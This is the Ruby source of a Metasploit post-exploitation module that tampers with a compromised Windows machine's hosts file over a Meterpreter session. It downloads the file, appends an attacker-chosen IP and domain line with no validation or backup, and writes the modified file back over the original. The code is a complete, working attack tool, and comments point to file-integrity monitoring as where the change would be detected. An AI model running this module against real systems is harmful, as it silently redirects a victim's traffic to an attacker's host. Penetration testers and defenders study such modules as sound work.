##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
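# Post module that appends one "IP<TAB>DOMAIN" line to the hosts file of a
# Windows target over an existing Meterpreter session.
#
# The module works on a local copy: it downloads the remote hosts file into a
# temporary file, appends the entry, and uploads the result back over the
# original. No backup of the previous hosts file is kept, and DOMAIN and IP are
# written verbatim (they are not checked to be a valid hostname or address).
#
# NOTE(review): the hosts file path is hard-coded to
# C:\WINDOWS\System32\drivers\etc\hosts. The upload is a write to that file on
# the target, so file-integrity monitoring on the hosts file is where such a
# modification would be noticed.
class MetasploitModule < Msf::Post

  # Registers the module metadata and its two required options.
  #
  # @param info [Hash] metadata passed in by the framework and merged with
  #   this module's own values through update_info
  def initialize(info={})
    super(update_info(info,
      'Name'         => 'Windows Manage Hosts File Injection',
      'Description'  => %q{
        This module allows the attacker to insert a new entry into the target
        system's hosts file.
      },
      'License'      => BSD_LICENSE,
      'Author'       => [ 'vt <nick.freeman[at]security-assessment.com>'],
      'Platform'     => [ 'win' ],
      'SessionTypes' => [ 'meterpreter' ]
    ))

    register_options(
      [
        OptString.new('DOMAIN', [ true, 'Domain name for host file manipulation.' ]),
        OptString.new('IP', [ true, 'IP address to point domain name to.' ])
      ])
  end

  # Downloads the target's hosts file, appends the DOMAIN/IP entry and uploads
  # the modified copy back to the same path.
  #
  # Prints an error and returns early when either option is nil. A
  # Rex::Post::Meterpreter::RequestError raised by the download is re-raised
  # unless its result code is 2.
  #
  # @return [void]
  def run
    if datastore['IP'].nil? || datastore['DOMAIN'].nil?
      print_error("Please specify both DOMAIN and IP")
      return
    end

    ip = datastore['IP']
    hostname = datastore['DOMAIN']
    hosts_path = 'C:\\WINDOWS\\System32\\drivers\\etc\\hosts'

    # Local scratch copy of the remote hosts file
    meterp_temp = Tempfile.new('meterp')
    meterp_temp.binmode
    temp_path = meterp_temp.path

    begin
      begin
        # Download the remote file to the temporary file
        client.fs.file.download_file(temp_path, hosts_path)
      rescue Rex::Post::Meterpreter::RequestError => re
        # Result code 2 is treated as "the file doesn't exist", which is okay:
        # the entry is then written to an otherwise empty file. Any other
        # failure is passed on to the caller.
        raise if re.result != 2
      end

      print_status("Inserting hosts file entry pointing #{hostname} to #{ip}..")

      # Block form closes the handle even if the write raises.
      ::File.open(temp_path, 'ab') do |hostsfile|
        hostsfile.write("\r\n#{ip}\t#{hostname}")
      end

      client.fs.file.upload_file(hosts_path, temp_path)
      print_good("Done!")
    ensure
      # Close and delete the local copy on every exit path rather than leaving
      # the downloaded hosts file on disk until the Tempfile is garbage
      # collected.
      meterp_temp.close!
    end
  end

end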